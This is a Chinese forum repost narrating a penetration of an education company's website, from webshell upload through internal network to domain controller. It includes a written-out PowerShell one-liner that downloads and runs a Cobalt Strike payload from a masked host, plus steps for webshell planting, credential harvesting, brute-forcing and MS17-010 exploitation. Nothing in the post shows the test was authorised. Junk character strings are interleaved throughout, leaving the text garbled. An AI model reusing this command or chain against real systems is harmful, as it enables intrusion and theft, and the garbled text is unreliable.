|
" H, [& Q* w! K9 r W. D, u# S
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路. i' w: \0 Q I) H8 o/ M
& i: [; y" }( \
, Z4 L7 m4 M; M& N6 { " |& D Y* Y7 L0 D
: h- S) @( @' V7 J9 U- S
3 a9 `6 [0 e6 Y& g# b3 E# F 正文8 |# H, Q a/ b+ f; a# \% `
N, J5 p' ?. |: {* }3 P
0 Y% v- i( D* |1 A 1 H1 A+ u S/ L( G) W
# ~4 ?$ _/ P1 k& v9 m7 q
9 K6 C! B/ l; D0 {* |
目标:www.xxxx.com(一家教育机构)
3 S) C6 m/ R* L5 w
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
# u4 [& F7 l2 Y
+ m! b" s$ `9 x" O' K) i& Z4 e' n' f- \/ o; K+ k$ ?
 , ?' w" O' e: ]6 B
& p5 Z( f9 m0 }1 [/ Q4 c. m8 K) g
# X* J4 \" J4 a: t. f. v7 N 进行了简单的信息搜集
# F( u) b. @; o
1 v/ C$ y/ ~' y6 P1 s
* g3 V4 q2 L" o% e
( _0 @/ Y- Q+ G5 i& C0 h0 ~: A. C/ |! c8 l2 @( v, o
子域名搜集" J2 [) Y3 _/ w; ^& m' t7 A
& b0 E+ a9 Y9 D! G
! f l. W- C) N: @% m
. \2 `0 M' {7 d) q2 t3 x
3 k: `+ M/ H! X2 i" v' D- e) b/ m: s% ?4 ^( y' M. i- ~4 x5 Q9 t& l8 U
fofa找资产
g, A; o& B0 _8 a0 ~7 E
* ^( w# T" a; N$ P1 y5 i* `7 M- r: I, U
& ?) Q& }6 y0 G1 }
: v! `! e* y9 p2 p. f
 9 `& L: o9 R/ g3 i
+ H% C) G5 s1 _5 d
2 T. H( G% m5 }* u; p 一共七个资产。去重之后只有两个。
: k# Y% M& K6 e7 r2 q& y# K( m
0 r( L0 R" ~0 V/ E7 P8 v, g3 Q( v
0 h3 L% ` u* G m0 b4 e( q . i) O6 z# _/ i7 \: ]$ P0 _, }% w/ _
5 K1 g) E* y! I0 u 目录探测# r3 K& N/ W4 s$ H: d
5 e0 x9 D+ b0 W! v f- f# r2 y' X1 F
+ y0 m$ q1 P: t* p; B- z
 $ |0 z% U8 e) D0 W# E% U# `
9 { M2 Z3 F9 Q. t% m+ B
% F9 n/ T8 L; ~/ J- G
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& w# L) p9 y( D7 x- @4 `7 d" ^
# o$ D4 l- h5 a, m
w- X8 L- k. q6 }. P
& ?* C+ |. \) X- B t; r
7 J; i0 o% B0 d2 f- ^/ W" v
我又尝试了通过修改返回包来绕过登录界面
2 j4 x. G9 @6 L) Y4 b1 P ( _+ ~3 W7 J7 k- C/ q. m; ]
+ c9 a( Z$ i! v2 m$ `- c
, @9 H7 D4 f) P
* J- _: K3 b1 b$ v* d" p8 B- l( ^
& H1 d* u+ i4 U9 d' ?) u 还是不行,尝试注入无果3 s9 D. h) Q4 \( H) w3 C8 C1 o
+ z5 I5 [" u/ D. h. ~1 @( Y
: m# e( l& g& V% v0 _. K: U
% @6 X+ a& d" Y
2 ^5 f# z! _% _! I, D3 i
* F8 o6 w% m% W. g4 \, \ V 不过我目录探测出了一处Spring信息泄露
- p: H4 [1 `$ A: [
) e2 g5 o$ S( ~* {+ |, B$ p6 l5 i' V0 ^: N. T
o, ~ r& t: p( E- g/ o" e: C; O
& \9 X+ Y" t2 u/ u4 O& a; d- w
 8 A$ N! R# L, o8 C
( S8 |! I: S7 _0 P
% @5 S3 a3 c4 D 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
0 U0 }4 K4 _3 N
5 I# `" ^$ a0 z* q+ T$ r2 D9 y4 Z( W# n# ~; b& [
& S O8 } K# {5 F. F 8 J8 \. l: O2 Y6 e5 I2 I
, T$ w( {" H: y0 ]& F; d" e ]
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。4 h9 t/ @3 l! [; X7 `% }5 i% V
+ W$ V% B0 X. a* G8 W
^/ m* S \# N  ?- ` o9 D( {2 |( N
3 u9 @: i* d" o3 U
4 k: X6 E- k& s: W3 I0 [' `
获取有些师傅到这一步就手机抓包电脑测了。( v9 c" `' m2 {6 j1 c
& Q' A5 z0 u" u% d8 r b
3 n* ?4 j/ M0 _3 _& _5 q" e Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
: W2 f0 U% f/ s; s$ B6 J 0 a/ S$ u# a& o$ n5 y7 j+ v
2 v ^9 C) J& m1 I 其中在一个公众号发现了小程序,可以进行注册。
* I) ]& d, o+ k/ ~# x3 Z! K, `
* _) @' L& ?; O7 k0 Y; Z
+ h* b! |* \! {& A 看到了头像上传,尝试上传获取WebShell
7 Y6 i! u5 ~+ O 4 U( u' R, H' Y. w$ S/ k/ c
1 r" h! ^+ R1 a' g6 c  & d e8 M% H" n0 _' }5 m3 t8 ]
6 W7 _' f% E: U; V
: O7 T( R$ v8 P- f& F1 f" Q
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
/ B+ T9 `: d+ t: p0 u + ~- U. q( j3 U7 \( @; u! w% ?# C
* D- d7 `6 F9 y% r
, h3 T/ {& S2 b {( B4 z- ? / k8 U* U5 R3 n* R
2 W7 \/ Z# t/ Z1 Z: Q7 J
然后上了大马
- ? w1 k& A, M1 ~
, C' E9 C/ E! v. i2 U5 }# ?2 b+ q( m3 r: |- P- N
8 u- c5 U* Z( U2 l4 C9 e6 G1 ~4 W& `
9 E# J! C8 R0 C/ _& I7 R/ F# g0 D! L
 7 V, {3 U5 u1 _$ x, s9 f
" B- S7 a; f+ i7 B" u" i9 X8 `1 u0 F% J
M0 J6 t* W/ ^; c
通过翻找文件发现数据库账号密码1 l# T+ Y/ g" O+ L# e$ Q+ J
o3 i7 {; P4 U$ W9 h0 w
2 `8 e& I) w% S; N& L5 Y
/ |) m/ O' s6 ~1 i2 M- r
Q% b3 H$ w$ Z5 K( w# p2 Z! S3 \) \& w
--内网渗透
9 @3 @( Y7 t" O6 e
$ U, ~/ T4 _7 H/ j3 E4 P0 r- }+ S) w7 p8 \* z' x! j3 Y( t* K
直接通过powershell执行 cs上线; r# _( x4 g6 e3 [5 j" l
9 A, F& F4 M0 l: e7 l/ l. m& M, a6 f9 L, i# D1 H
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
* u7 m6 J( G. n- J I5 u5 j9 y
( L! u$ \( _. \' X6 f! ?8 X% s, O: Z2 Z9 ^, H' I( t M
 ! D7 O. R( g0 Q" {
[6 _. v2 k1 ?/ d2 i
0 _- l# L: P3 f# M7 W 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破1 Y }6 X( h$ B# K4 w! n& |
* C* @8 f, f5 P/ v/ q! j5 T+ M0 m
0 u" w3 a; [9 G) R( q2 D5 T! V
0 H8 M' a3 o; r0 O& ?( ]4 E ( T8 p( _1 _" D; h# ~
* J1 y7 D6 ]& Z6 f9 e. S) R; H- Q1 M
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
. u$ W8 z2 j2 \3 K* G
$ u8 A; R4 I/ R
5 X* |! m: X9 L& B: D! T* M+ J
0 |6 o' _( O% h: ^6 n7 ^7 ?
C! B' f, L! }! e& N" a! w) D* J$ a0 ^: v1 @& u
 + O) H: m; X8 _8 t8 P
! V5 ^8 B7 i- U O- h6 e
: b5 p) T; h) \( d9 B2 B
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# c; U2 c2 o: A. ]
: t- H( {' O9 {. }- T0 H' o! w7 f8 ~ w0 ]- E
$ s& W* l" A: A3 P3 @0 a$ H0 r: { t' {2 x& ]5 C$ G7 ^+ I) w6 o( c
 + K3 Z+ y' ^6 Q& ~7 f& y, y
2 N( `9 V4 ~! h. w# u" p/ Y. W
1 S( V' I, C% g
0 a) f1 \3 P$ C8 M9 ]. B8 P
* n0 a6 J/ L$ Z! s
8 O/ ]0 ]* r3 z; M+ p& J" s
+ R" ?$ c2 `6 Q8 A
3 s( ^6 H: I; w* Y2 ]& ^
- X2 ]5 |. h, i2 P$ d6 ? D. c1 \ }9 |- s
' M ]5 P5 j% b; [ 小结4 P+ z( M1 G/ R
8 k2 R( [* @ n. ]+ D5 P
1 v M0 F8 Z/ u- B8 v7 V ~
% ?+ h, P k& |& ~- ~3 W
& X3 l4 W& x/ Z
1 |( w7 i& [' e$ p; {: t, n
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!1 E8 _. M8 i' w3 @" n L6 G
& X) v" |$ O1 r' B m; N0 @, f
5 Z6 g: y/ a) g/ O- X. O
1 x/ Y" q) h7 Z0 ^+ k! S$ e
$ J; f# i% I, u! y. S; o9 F$ {3 m( u
* n$ c# A* b' `2 B U$ d* q
- 2 L% k, i! e) S' x. w8 H
: p- Y4 R; L! ]$ ^5 n/ X4 m
& q7 G$ g9 @6 Q) y8 Z- Q) Z" ?6 K -
& @1 x6 f; U- D! j% c; U5 V 5 N4 L8 w% e/ Z- ?7 i, [9 X: Q
5 D& f+ U$ m: R' @* r/ y i
3 L6 C& c! z2 H& Z
# R p" Y6 [7 ^. | 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
8 ?& j: O) v! u
% s. Z* B6 l8 L
; V0 K; O) B9 d
3 `0 S8 g. f; T | 
发表于 2024-3-1 19:41:32
收藏
支持
反对